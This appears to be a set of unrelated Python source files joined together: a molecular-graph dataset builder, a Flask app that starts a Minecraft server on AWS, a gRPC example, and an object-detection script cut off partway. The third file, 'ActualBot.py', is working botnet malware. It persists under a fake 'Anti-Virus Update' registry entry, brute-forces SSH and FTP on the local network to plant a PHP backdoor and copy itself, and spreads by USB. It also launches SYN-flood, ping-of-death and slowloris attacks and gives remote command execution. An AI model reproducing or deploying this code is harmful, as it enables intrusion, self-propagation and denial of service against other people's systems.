Output: List of graphs with node features and adjacency
"""
#atomMin, atomMax, minDist, maxDist, files = getMinMaxVals(norm, nFiles, maxDist)
if not os.path.isdir(data_path + "/fastload"):
os.mkdir(data_path + "/fastload")
if not os.path.isdir(data_path + "/test_set"):
os.mkdir(data_path + "/test_set")
destination = "/fastload/"
files = sorted(glob.glob(data_path+'*h5*'))
atomMin = 0
atomMax = 95
atomRange = (atomMax - atomMin) + 1
N = len(files)
random.shuffle(files)
print('Found %d graph files' % (N))
graphData = []
pbar = tqdm(total=nFiles)
for iter, f in enumerate(files):
f = f.replace(data_path, "")[:-3]
if not os.path.isfile(data_path + destination[1:] + f + '.h5'):
loadData = h5py.File(data_path + f + '.h5', 'r')
nFeatures = loadData.get('NFM')
eFeatures = loadData.get('EFM')
edgeIndex = loadData.get('EAR')
edgeIndex = torch.LongTensor(np.array(edgeIndex, dtype=int))
eFeatures = torch.Tensor(eFeatures[:,0])
nFeatures = torch.FloatTensor(nFeatures)
### Cast to Torch
edgeIndex = torch.LongTensor(np.array(edgeIndex, dtype=int))
eFeatures = torch.Tensor(eFeatures)
nFeatures = torch.FloatTensor(nFeatures)
### Obtain the source and sink node pairs
softAdj = transformers(edgeIndex, eFeatures, nNodes, minDist, maxDist, deadVal)
ph = nFeatures.T.clone()
atomLabels = torch.zeros((nNodes, atomRange)) # Last index is for dummy nodes
for j, val in enumerate(ph[0].T):
if val != deadVal: # If not dummy node
atomLabels[j][int(val)] = 1
else: # If dummy node
atomLabels[j][0] = 1
atoms = torch.tensor([normFeatures(val, atomMin, atomMax) if val != deadVal else val for val in ph[0]]).unsqueeze(1)
y_atom = torch.zeros((atomRange, 1))
for i in range(len(ph[0])):
if int(ph[0][i]) != deadVal:
y_atom[int(ph[0][i])] = 1
else:
y_atom[0] = 1
for i in range(ph[1:].size()[0]):
for j in range(ph[1:].size()[1]):
if ph[1:][i][j] == deadVal:
break
else:
ph[1:][i][j] = normFeatures(ph[1:][i][j], minDist, maxDist)
satLabels = ph[1:].T
nFeatures = torch.cat((atoms, satLabels, softAdj), dim=1)
if loadPDF == False:
generator = simPDFs_xyz()
generator.set_parameters_xyz(rmin=0, rmax=30.1, rstep=0.1, Qmin=0.8, Qmax=26, Qdamp=0.03, Biso=0.3, delta2=0)
generator.genPDFs_xyz(xyzPath+'/{}.xyz'.format(f))
r, Gr = generator.getPDF_xyz()
else:
PDF = np.loadtxt(data_path + '/' + f + '_PDF.txt', delimiter=' ')
Gr = PDF[:, 1]
Gr[:10] = torch.zeros((10,))
#Gr += np.abs(np.min(Gr))
Gr /= np.max(Gr)
Gr = torch.tensor(Gr, dtype=(torch.float)).view(1, len(Gr), 1)
if not iter < (1 - test_set_ratio) * len(files):
destination = "/test_set/"
save_graphData = dict(hf_atomLabels=atomLabels, hf_nFeatures=nFeatures, hf_satLabels=satLabels, hf_softAdj=softAdj, hf_y_atom=y_atom, hf_Gr=Gr)
hf_graphData = h5py.File(data_path + destination + f + '.h5', 'w')
for dict_label, dict_Data in save_graphData.items():
hf_graphData.create_dataset(dict_label, data=dict_Data)
hf_graphData.close()
graphData.append((f, atomLabels, nFeatures, satLabels, softAdj, y_atom, Gr))
pbar.update(1)
print("Time used to load data:", (time.time() - start_time) / 60, "min")
pbar.close()
return graphData, atomRange, files
def create_graphs(files, label, saveFolder, satellites, nAtoms, return_dict):
renorm_dict = {}
bc = OverlapCalculator()
bc.atomradiitable = 'covalent'
pbar = tqdm(total=len(files))
for file in files:
if os.path.isfile(saveFolder +'/'+ str(file[0:-4]) + ".h5"):
print (file , "Already Made")
else:
print(file)
cluster, stru_dim = define_space(file, saveFolder, nAtoms, plot=False)
#cluster = loadStructure(saveFolder +'/'+ file)
stru_dim = "3D"
NFM = np.zeros((numb_nodes,numb_nodeF)) + deadVal
ele_min = 99
ele_max = 0
for i, cords in enumerate(cluster):
atompos = np.array([cluster[i].x, cluster[i].y, cluster[i].z])
ele_sym = cluster.element[i]
atomnumber = element(ele_sym).atomic_number
if atomnumber > ele_max:
ele_max = atomnumber
if ele_min > atomnumber:
ele_min = atomnumber
NFM[i][0] = atomnumber
for j, sat in enumerate(satellites):
NFM[i][j+1] = np.linalg.norm(atompos - sat)
NFM_graphData = NFM.copy()
NFM = NFM.T
NFM = NFM[1:]
dist_min = np.min(NFM[NFM != deadVal])
dist_max = np.max(NFM[NFM != deadVal])
# Edge features
G = nx.Graph() # create an empty graph with no nodes and no edges
G.add_nodes_from(range(numb_nodes)) # add a list of nodes
dist_list = []
index = []
for i in range(len(cluster)):
atom_neighbors_1 = bc.getNeighborSites(i)
ph_index = []
for j in range(i+1,len(cluster)):
position_0 = cluster.x[i], cluster.y[i], cluster.z[i]
position_1 = cluster.x[j], cluster.y[j], cluster.z[j]
new_dist = distance(position_0, position_1)
dist_list.append(new_dist)
ph_index.append([i,j])
G.add_edges_from([(i, j, {'Distance': new_dist})])
index.append(ph_index)
dist_list = np.array(dist_list)
dist_min2 = np.min(dist_list)
dist_max2 = np.max(dist_list)
Edge_feature_matrix = np.zeros([1, len(G.edges)]) # This should be dynamic
for count, edge in enumerate(G.edges):
Edge_feature_matrix[:][0][count] = nx.get_edge_attributes(G, "Distance")[edge]
edge_list = []
for edge in G.edges:
edge_list.append([edge[0], edge[1]])
Edge_array = np.asarray(edge_list).T
graphData = dict(NFM=NFM_graphData, EFM=Edge_feature_matrix.T, EAR=Edge_array)
hf_graphData = h5py.File(saveFolder +'/'+ str(file[0:-4]) + '.h5', 'w')
for dict_label, dict_Data in graphData.items():
hf_graphData.create_dataset(dict_label, data=dict_Data)
hf_graphData.close()
renorm_dict.update({'{}'.format(file) : {'Node dist min' : dist_min,'Node dist max' : dist_max,
'Edge dist min' : dist_min2, 'Edge dist max' : dist_max2,
'Atom min' : ele_min, 'Atom max' : ele_max,
'Structure dim' : stru_dim}})
pbar.update(1)
pbar.close()
df = pd.DataFrame.from_dict(renorm_dict, orient="index")
return_dict[label] = df
return None
def normFeatures(x, min, max):
return (x-min)/(max-min)
def distance(position_0, position_1):
""" Returns the distance between vectors position_0 and position_1 """
return np.sqrt((position_0[0] - position_1[0]) ** 2 + (position_0[1] - position_1[1]) ** 2 + (
position_0[2] - position_1[2]) ** 2)
def dist_check(cluster, bc, overlap = 0.7):
for idx1 in range(len(cluster)):
for idx2 in range(idx1 + 1, len(cluster)):
pos1 = np.array([cluster[idx1].x, cluster[idx1].y, cluster[idx1].z])
pos2 = np.array([cluster[idx2].x, cluster[idx2].y, cluster[idx2].z])
dist1 = distance(pos1, pos2)
dist2 = bc.atomradiitable.lookup(cluster.element[idx1]) + bc.atomradiitable.lookup(cluster.element[idx2])
if dist2 * overlap > dist1:
return False
return True
def getMinMaxDist(cluster):
minDist = 99
maxDist = 0
for idx1 in range(len(cluster)):
for idx2 in range(idx1 + 1, len(cluster)):
pos1 = np.array([cluster[idx1].x, cluster[idx1].y, cluster[idx1].z])
pos2 = np.array([cluster[idx2].x, cluster[idx2].y, cluster[idx2].z])
dist1 = distance(pos1, pos2)
if dist1 > maxDist:
maxDist = dist1
elif minDist > dist1:
minDist = dist1
return minDist, maxDist
def structure_check(files, folder, folder_save):
ph = files.copy()
bc = OverlapCalculator()
bc.atomradiitable = 'covalent'
distance_list = []
fails = []
print('\nGetting min and max for atomnumber:')
distList = []
pbar = tqdm(total=len(files))
for count, file in enumerate(files):
try:
cluster = loadStructure(folder + '/' + file)
dpc = DebyePDFCalculator()
_, _ = dpc(cluster)
bc(cluster)
except:
ph.remove(file)
fails.append(file)
pbar.update(1)
continue
if len(cluster) < minimum_atoms or len(cluster) > maximum_atoms:
ph.remove(file)
pbar.update(1)
continue
minDist, maxDist = getMinMaxDist(cluster)
distList.append([minDist, maxDist])
if not os.path.isfile(folder_save+'/'+file):
copyfile(folder+'/'+file,folder_save+'/'+file)
pbar.update(1)
pbar.close()
distList = np.array(distList)
maxmax = np.amax(distList)
minmin = np.amin(distList)
if fails != []:
print('Following files failed loading:')
for file in fails:
print(file)
else:
print('No files failed loading')
print ("MinDist found to: ", minmin)
print ("MaxDist found to: ", maxmax)
return ph, minmin, maxmax
def move_structures(enliste, folder):
for file in enliste:
cluster = loadStructure(folder + '/' + file)
#if cluster.x.mean() != 0 or cluster.y.mean() != 0 or cluster.z.mean() != 0:
cluster.x = cluster.x - cluster.x.mean()
cluster.y = cluster.y - cluster.y.mean()
cluster.z = cluster.z - cluster.z.mean()
cluster.write(folder + '/' + file, format="xyz")
return
if __name__ == '__main__':
global root # Root folder for script
global folder # Folder where xyz are fetched
global saveFolder # Where the graphs will be saved
global deadVal # Value assigned dummy nodes
global numb_nodes # Maximum number of nodes in graph, numb_nodes = maximum_atoms
global numb_nodeF # Node features: x, y, z and atom number
global minimum_atoms # Smallest structural motif
global maximum_atoms # Largest structural motif, numb_nodes = maximum_atoms
numb_lists = 8 # The number of threads generated
numSats = 11
satellites = sampleSphere(numSats)
index = ['Satellite{}'.format(i) for i in range(np.shape(satellites)[0])]
# Define values
deadVal = -1
numb_nodes = 200
numb_nodeF = 1+np.shape(satellites)[0]
minimum_atoms = 4
maximum_atoms = numb_nodes
# Placeholders
atom_min = 99
atom_max = 0
# Get files
root = os.getcwd()
folder = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/XYZ_200atoms/'
enliste = sorted(os.listdir(folder))
enliste = [file for file in enliste if file[0] != '.' and file[-4:] == '.xyz']
saveFolder = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/Graphs_200atoms/'
satPath = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/'
shall_we_check_structures = True
np.random.shuffle(enliste)
#enliste = enliste[:10]
if shall_we_check_structures:
enliste, minDist, maxDist = structure_check(enliste, folder, saveFolder)
minDist = 0
move_structures(enliste, folder) # Move middle atom_1transs into origo
satellites *= 0.5*maxDist # Half of the longest distance
start_time = time.time()
print(np.shape(satellites))
df = pd.DataFrame(satellites, index=[index],
columns=['x','y','z'])
df.to_csv(satPath+'/normvaluesSatellitePositions_{}minDist_{}maxDist_200atoms_Qmin0p8_Qmax26_ADP0p3.csv'.format(minDist, maxDist))
print('\n{} xyz files matched search criteria'.format(len(enliste)))
idx = math.ceil(len(enliste)/numb_lists)
list_of_slices = []
for i in range(numb_lists):
list_of_slices.append(enliste[i*idx:(1+i)*idx])
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for label, i in enumerate(list_of_slices):
p = multiprocessing.Process(target=create_graphs, args=(i, label, saveFolder, satellites, numb_nodes, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
print('\nCreating renorm csv')
for i, dicts in enumerate(return_dict.values()):
if i == 0:
df = dicts
else:
df = pd.concat([dicts,df])
df.to_csv(satPath+'/normvaluesSatelliteDistances_200atoms_Qmin0p8_Qmax26_ADP0p3.csv')
print('Took {:.2f} min'.format((time.time() - start_time)/60))
print ("Normalising all the data and save it as h5py ready to fastload and splitting the data into training/test set.")
graphData, atomRange, allFiles = makeData(data_path=saveFolder,
xyzPath=saveFolder,
norm=satPath+'/normvaluesSatelliteDistances_200atoms_Qmin0p8_Qmax26_ADP0p3.csv',
nFiles=len(enliste),
nNodes=numb_nodes,
loadPDF=False, # Either generates or reads PDFs
test_set_ratio = 0.2,
deadVal = deadVal,
maxDist = maxDist)
|
server.py
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS, cross_origin
from multiprocessing import Process
import json
import boto3
import time
import paramiko
import os
import io
import warnings
app = Flask(__name__)
CORS(app)
SERVER_NAME = os.getenv('SERVER_NAME', 'On Demand Minecraft Server')
# If there is a server address, display this publicly in the template instead of returning the IP on start
SERVER_ADDRESS = os.getenv('SERVER_ADDRESS')
# Stop paramiko from clogging the log output with depreciation warnings
warnings.filterwarnings(action='ignore', module='.*paramiko.*')
# Paraminko ssh information
key_string = os.getenv('SSH_KEY').replace('\\n', '\n')
key = paramiko.RSAKey.from_private_key(io.StringIO(key_string))
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def serverWaitOk(client, instanceIp, instanceId):
"""Waits for the server to reach a valid state so that commands can be executed on the server"""
checksPassed = False
status = 'initializing'
instanceIds = [instanceId]
print('Waiting for instance', instanceId,
'to have status ok', flush=True)
while (not checksPassed) and (status == 'initializing'):
statusCheckResponse = client.describe_instance_status(
InstanceIds=instanceIds)
instanceStatuses = statusCheckResponse['InstanceStatuses']
instanceStatus = instanceStatuses[0]
instanceStatus = instanceStatus['InstanceStatus']
status = instanceStatus['Status']
checksPassed = status == 'ok'
print('Instance', instanceId, 'status is', status, flush=True)
time.sleep(5)
if checksPassed:
initServerCommands(instanceIp)
else:
print('An error has occurred booting the server', flush=True)
def initServerCommands(instanceIp):
"""SSH connects to server and executes command to boot minecraft server"""
# Connect/ssh to an instance
try:
# Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2
sshClient.connect(hostname=instanceIp, username="ubuntu", pkey=key)
# Execute a command(cmd) after connecting/ssh to an instance
stdin, stdout, stderr = sshClient.exec_command(
"screen -dmS minecraft bash -c 'java " + os.getenv('MEMORY_ALLOCATION', '') + " -jar server.jar nogui'") #-Xmx2G -XX:MaxMetaspaceSize=256M
print('Starting minecraft', flush=True)
# close the client connection once the job is done
sshClient.close()
except Exception as err:
print('Error running server commands:')
print(err, flush=True)
def render_index(**vargs):
return render_template('index.html', serverName=SERVER_NAME, serverAddress=SERVER_ADDRESS, **vargs)
@app.route('/')
def loadIndex():
"""Main endpoint for loading the webpage"""
return render_index()
@app.route('/initServerMC', methods=['POST'])
def initServerMC():
inputPass = request.form['pass']
message = "Password Incorrect!"
if inputPass == os.getenv('SERVER_PASSWORD'):
print('IP', request.remote_addr,
'has supplied correct password', flush=True)
# Instantiate server here or return ip address if already running
client = boto3.client(
'ec2',
aws_access_key_id=os.getenv('ACCESS_KEY'),
aws_secret_access_key=os.getenv('SECRET_KEY'),
region_name=os.getenv('EC2_REGION')
)
message = manageServer(client)
else:
print('IP', request.remote_addr,
'gave wrong password \'{}\''.format(inputPass), flush=True)
return render_index(ipMessage=message)
def manageServer(client):
"""Gets IP Address for return to webpage otherwise boots server"""
returnString = 'ERROR'
instanceIds = [os.getenv('INSTANCE_ID')]
response = client.describe_instances(InstanceIds=instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
if len(instances) > 0:
instance = instances[0]
print('Found instance with id', instance['InstanceId'], flush=True)
state = instance['State']
stateName = state['Name']
if (stateName == 'stopped') or (stateName == 'shutting-down'):
returnString = startServer(client, instance['InstanceId'])
elif stateName == 'running':
ipAddress = instance['PublicIpAddress']
if SERVER_ADDRESS:
returnString = 'Server is up and running!'
else:
returnString = 'Server is up and running with IP {}'.format(ipAddress)
else:
print('Instance state \'{}\' is unrecognized'.format(
stateName), flush=True)
returnString = 'Server is in an unrecognized state, please try again in a few minutes'
return returnString
def startServer(client, instanceId):
"""Starts the specified AWS Instance from the configuration"""
# Gets proper variables to attempt to instantiate EC2 instance and start minecraft server
returnString = 'ERROR'
instanceIds = [instanceId]
response = client.start_instances(InstanceIds=instanceIds)
print('AWS EC2 START RESPONSE\n')
print(response)
print('\n', flush=True)
stateCode = 0
while not (stateCode == 16):
print('Waiting for instance', instanceId, 'to start', flush=True)
time.sleep(3)
response = client.describe_instances(InstanceIds=instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
instance = instances[0]
state = instance['State']
stateCode = state['Code']
ipAddress = instance['PublicIpAddress']
if SERVER_ADDRESS:
returnString = 'Server is starting, this may take a few minutes... Remember to hit refresh in Minecraft!'
else:
returnString = 'Server is starting, it may take a few minutes. Server IP: {}'.format(ipAddress)
# SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
p = Process(target=serverWaitOk, args=(client, ipAddress, instanceId))
p.start()
return returnString
if __name__ == "__main__":
app.run()
|
ActualBot.py
|
import os
import time
import base64
import shutil
import socket
import random
import ftplib
import paramiko
import win32api
import platform
import win32con
import win32gui
import threading
import win32file
import subprocess
import win32console
from Queue import Queue
from Crypto.Cipher import XOR, AES
from Crypto.Hash import SHA256
from __assets__ import Lo0sR, Bully
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
path_to_files = "C:/Users/" + win32api.GetUserName() + "/Documents/Windows Defender/"
NUMBER_OF_THREADS = 4
JOB_NUMBER = [1, 2, 3, 4, ]
queue = Queue()
common_ports = [21, 22]
passwords = []
events = []
ddos_events = []
connected = False
net_devices = []
class Startup:
def __init__(self):
self.user = win32api.GetUserName() # Username
self.reg_exist = True
def hide(self):
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
def add_to_registry(self): # add to startup registry
hkey = win32api.RegCreateKey(win32con.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run")
win32api.RegSetValueEx(hkey, 'Anti-Virus Update', 0, win32con.REG_SZ, __file__)
win32api.RegCloseKey(hkey)
def add_to_startup(self):
path = 'C:\\Users\\' + self.user + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'
if os.path.isfile(path + __file__.split("")) == True:
pass
else:
shutil.copy(__file__, path)
def make_dirs(self):
if not os.path.exists(path_to_files + "downloads"):
os.mkdir(path_to_files + "downloads")
def run(self):
self.hide()
self.make_dirs()
#self.add_to_startup() # Choose startup or registry (both start on boot)
self.add_to_registry()
class EncryptionHandler:
def __init__(self):
self.pswd = "\x1f\xbf\x9fV\x1c'\xe7\xbf\xddo\x1e@@\xe7l\xce\xed\xc0\x12\xd4\xed\xdbNZ!\xd9\xb3\x81|\xa4\xe7"
self.padding = "{"
def _key(self):
key = SHA256.new(self.pswd)
key = key.digest()
return key
def _pad(self, data):
length = len(data)
to_pad = 0
while length % 16:
to_pad += 1
length += 1
return data + (self.padding * to_pad)
def _unpad(self, data):
data = data.strip(self.padding)
return data
def encrypt(self, data):
print str(data)
cipher = AES.new(self._key(), AES.MODE_CTR, counter=lambda: self._key()[:16])
data = self._pad(data)
data = cipher.encrypt(data)
cipher = XOR.new(self._key())
data = cipher.encrypt(data)
data = base64.b64encode(data)
return data
def decrypt(self, data):
cipher = XOR.new(self._key())
data = base64.b64decode(data)
data = cipher.decrypt(data)
cipher = AES.new(self._key(), AES.MODE_CTR, counter=lambda: self._key()[:16])
data = cipher.decrypt(data)
data = self._unpad(data)
return data
class DenialOfService:
def ping_of_death(self, target):
from scapy.all import IP, ICMP, send
src = "%i.%i.%i.%i" % (
random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
ip_hdr = IP(src, target)
_packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
send(_packet)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def slow_loris(self, target):
Bully.Bully(target)
class FileHandler:
def upload(self, filename):
time.sleep(0.5)
if os.path.isfile(filename):
with open(filename, 'rb') as f:
bytesToSend = f.read(1024)
Bot().send(bytesToSend)
while bytesToSend:
bytesToSend = f.read(1024)
Bot().send(bytesToSend)
Bot().send("EOF")
def download(self, filename):
data = Bot().receive()
f = open('new_' + filename, 'wb')
f.write(data)
while data:
data = Bot().receive()
if data == "EOF":
break
else:
f.write(data)
print "Download Complete!"
f.close()
class Spread:
def load_passwords(self):
global passwords
with open("__assets__/passwords.txt", "r") as f:
for pswd in f.readlines():
time.sleep(0.1)
passwords.append(pswd.strip("\n"))
return None
def locate_usb(self):
drive_list = []
drivebits = win32file.GetLogicalDrives()
for d in range(1, 26):
mask = 1 << d
if drivebits & mask:
drname = '%c:\\' % chr(ord('A') + d)
t = win32file.GetDriveType(drname)
if t == win32file.DRIVE_REMOVABLE:
drive_list.append(drname)
return drive_list
def hijack_usb(self):
while True:
for usb in self.locate_usb():
if usb:
for file in os.listdir("."):
shutil.copy(file, usb)
time.sleep(120)
def get_gateway(self):
p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0)
return p.src
def scan_lan(self):
global net_devices
time.sleep(0.5)
base_ip = self.get_gateway()
base_ip = base_ip.split('.')
base_ip = "%s.%s.%s." % (base_ip[0], base_ip[1], base_ip[2])
for ip in range(1, 255):
ip = str(base_ip) + str(ip)
for port in common_ports:
print ip
if port == 22:
ThreadHandler().add_to_threads(Spread().brute_ssh, args=str(ip))
else:
ThreadHandler().add_to_threads(Spread().brute_ftp, args=str(ip))
return None
def brute_ftp(self, host):
global passwords
for pswd in passwords:
try:
ftp = ftplib.FTP(host)
ftp.login("root", pswd)
ftp.storlines("STOR %s" % "index.php", open("some_infected_php_file.php", "r")) # Change to actual php backdoor (You can use Weevely to generate a backdoor)
ftp.quit()
except Exception:
pass
return None
def brute_ssh(self, host):
global passwords
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for pswd in passwords:
try:
ssh.connect(host, port=22, username="root", password=pswd)
sftp = ssh.open_sftp()
ssh.exec_command("cd ..")
ssh.exec_command("mkdir .etc")
ssh.exec_command("cd .etc")
for file in os.listdir("SSH_files_linux"):
sftp.put(file, ".etc")
sftp.close()
ssh.exec_command("chmod +x ActualBot.py")
ssh.exec_command("./ActualBot.py")
ssh.close()
except paramiko.AuthenticationException:
pass
except socket.error:
pass
return None
def run(self):
ThreadHandler().add_to_threads(target=self.load_passwords, args=None)
ThreadHandler().add_to_threads(target=self.scan_lan, args=None)
ThreadHandler().add_to_threads(target=self.hijack_usb, args=None)
class Bot:
def __init__(self):
self.ip = '' # IP of Host that the server is running on
self.port = 44353 # Host's port
def connect(self):
global connected
while connected == False:
time.sleep(1)
try:
s.connect((self.ip, self.port))
except socket.error:
pass
finally:
connected = True
def send(self, data):
global connected
data = EncryptionHandler().encrypt(data)
try:
s.send(str(data))
except socket.error as e:
print e
time.sleep(2.5)
connected = False
def receive(self):
global s
global connected
try:
data = s.recv(1368)
if data:
return EncryptionHandler().decrypt(data)
if not data:
s = socket.socket()
if connected != False:
connected = False
self.connect()
except socket.error as e:
print e
s = socket.socket()
if connected != False:
connected = False
self.connect()
def exec_command(self, command):
command = command.split(' ')
if command[0] == 'cd':
os.chdir(command[1])
self.send(os.getcwd())
elif command[0] == 'info':
info = platform.uname()
self.send('OS: %s\nHost Name: %s' % (info[0], info[1]))
elif command[0] == 'exit':
s.close()
self.connect()
elif command[0] == ('start' or 'Start'):
data = ' '.join(command)
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
elif command[0] == "upload":
FileHandler().download(command[1])
elif command[0] == "download":
FileHandler().upload(command[1])
elif command[0] == 'DDoS':
if command[1]:
if command[2]:
if command[1] == 'pod':
thread_id = ThreadHandler().add_to_threads(DenialOfService().ping_of_death, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == "sl":
thread_id = ThreadHandler().add_to_threads(DenialOfService().slow_loris, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == "syn":
thread_id = ThreadHandler().add_to_threads(DenialOfService().syn_flood, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == 'stop':
ThreadHandler().stop(ddos_events[0])
self.send('Stopped DoS!')
else:
self.send("[!]You need to specify a target!")
else:
self.send("[!]You need to specify an attack type!")
else:
data = ' '.join(command)
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = cmd.stdout.read() + cmd.stderr.read()
if len(output) > 65520:
self.send("[!]Too large!")
else:
self.send(output)
def handler(self):
while True:
data = self.receive()
if data:
data.split(' ')
if data[0] == 'ok?':
self.send('ok!')
if data[0] == 'download':
print data[1]
if len(data[1]) > 0:
FileHandler().upload(data[1])
if data[0] == 'upload':
print data[1]
if len(data[1]) > 0:
FileHandler().download(data[1])
else:
self.exec_command(data)
def run(self):
self.connect()
self.handler()
class ThreadHandler:
def stop(self, event_id):
event = events[event_id]
event.set()
def add_to_threads(self, target, args):
global events
event = threading.Event()
events.append(event)
if args:
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
else:
t = threading.Thread(target=target)
t.daemon = True
t.start()
thread_id = events.index(event)
return thread_id
def create_workers(self):
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=self.work)
t.daemon = True
t.start()
def work(self):
while True:
x = queue.get()
if x == 1:
Startup().run()
if x == 2:
Bot().run()
if x == 3:
Spread().run()
if x == 4:
Lo0sR.ThreadHandler().run()
queue.task_done()
def create_jobs(self):
for x in JOB_NUMBER:
queue.put(x)
queue.join()
def run(self):
self.create_workers()
self.create_jobs()
if __name__ == '__main__':
ThreadHandler().run()
|
wait_for_ready_example.py
|
# Copyright 2019 The gRPC Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Python example of utilizing wait-for-ready flag."""
from __future__ import print_function
import logging
from concurrent import futures
from contextlib import contextmanager
import socket
import threading
import grpc
from examples import helloworld_pb2
from examples import helloworld_pb2_grpc
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.INFO)
@contextmanager
def get_free_loopback_tcp_port():
if socket.has_ipv6:
tcp_socket = socket.socket(socket.AF_INET6)
else:
tcp_socket = socket.socket(socket.AF_INET)
tcp_socket.bind(('', 0))
address_tuple = tcp_socket.getsockname()
yield "localhost:%s" % (address_tuple[1])
tcp_socket.close()
class Greeter(helloworld_pb2_grpc.GreeterServicer):
def SayHello(self, request, unused_context):
return helloworld_pb2.HelloReply(message='Hello, %s!' % request.name)
def create_server(server_address):
server = grpc.server(futures.ThreadPoolExecutor())
helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
bound_port = server.add_insecure_port(server_address)
assert bound_port == int(server_address.split(':')[-1])
return server
def process(stub, wait_for_ready=None):
try:
response = stub.SayHello(
helloworld_pb2.HelloRequest(name='you'),
wait_for_ready=wait_for_ready)
message = response.message
except grpc.RpcError as rpc_error:
assert rpc_error.code() == grpc.StatusCode.UNAVAILABLE
assert not wait_for_ready
message = rpc_error
else:
assert wait_for_ready
_LOGGER.info("Wait-for-ready %s, client received: %s", "enabled"
if wait_for_ready else "disabled", message)
def main():
# Pick a random free port
with get_free_loopback_tcp_port() as server_address:
# Register connectivity event to notify main thread
transient_failure_event = threading.Event()
def wait_for_transient_failure(channel_connectivity):
if channel_connectivity == grpc.ChannelConnectivity.TRANSIENT_FAILURE:
transient_failure_event.set()
# Create gRPC channel
channel = grpc.insecure_channel(server_address)
channel.subscribe(wait_for_transient_failure)
stub = helloworld_pb2_grpc.GreeterStub(channel)
# Fire an RPC without wait_for_ready
thread_disabled_wait_for_ready = threading.Thread(
target=process, args=(stub, False))
thread_disabled_wait_for_ready.start()
# Fire an RPC with wait_for_ready
thread_enabled_wait_for_ready = threading.Thread(
target=process, args=(stub, True))
thread_enabled_wait_for_ready.start()
# Wait for the channel entering TRANSIENT FAILURE state.
transient_failure_event.wait()
server = create_server(server_address)
server.start()
# Expected to fail with StatusCode.UNAVAILABLE.
thread_disabled_wait_for_ready.join()
# Expected to success.
thread_enabled_wait_for_ready.join()
server.stop(None)
channel.close()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
object_detect.py
|
#python3 main.py --bin ssd_mobilenet/MobileNetSSD_deploy.bin --xml ssd_mobilenet/MobileNetSSD_deploy.xml --labels ssd_mobilenet/labels.txt --conf_threshold=0.4
#python3 main.py --bin ssd_resnet50/saved_model.bin --xml ssd_resnet50/saved_model.xml --labels ssd_resnet50/labels.txt --conf_threshold=0.1
#python3 main.py --xml ssd_mobilenet/ssd_resnet50/openvino/saved_model.xml --bin ssd_mobilenet/ssd_resnet50/openvino/saved_model.bin --labels ssd_mobilenet/labels.txt
#################################################
# Original script could be found on #
# https://github.com/leswright1977/RPI4_NCS2 #
# Put this script into 'RPI4_NCS2/src' #
#################################################
import cv2
import time
import numpy
from multiprocessing import Process
from multiprocessing import Queue
from picamera.array import PiRGBArray
from picamera import PiCamera
from sys import getsizeof
#hacked from:
#https://software.intel.com/articles/OpenVINO-Install-RaspberryPI
#https://opencv2-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
#https://github.com/PINTO0309/MobileNet-SSD-RealSense/blob/master/SingleStickSSDwithUSBCamera_OpenVINO_NCS2.py
#https://raspberrypi.stackexchange.com/questions/87062/overhead-counter
#Les Wright Dec 24 2018 (modified to support picam 30 Dec 2018)
#refined to warp speed (30 fps video, 28 fps inferencing 20 Feb 2019)
#Note cv2.dnn.blobFromImage, the size is present in the XML files, we could write a preamble to go get that data,
#Then we dont have to explicitly set it!
confThreshold = 0.4
# Load model
net = cv2.dnn.readNet('ssd_mobilenet/bosch_model_0/saved_model.xml', 'ssd_mobilenet/bosch_model_0/saved_model.bin')
# Specify target device
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
labels_file = 'labels.txt'
with open(labels_file, 'r') as f:
labels = [x.strip() for x in f]
print(labels)
#define the function that handles our processing thread
def classify_frame(net, inputQueue, outputQueue):
# keep looping
while True:
# check to see if there is a frame in our input queue
if not inputQueue.empty():
# grab the frame from the input queue, resize it, and
# construct a blob from it
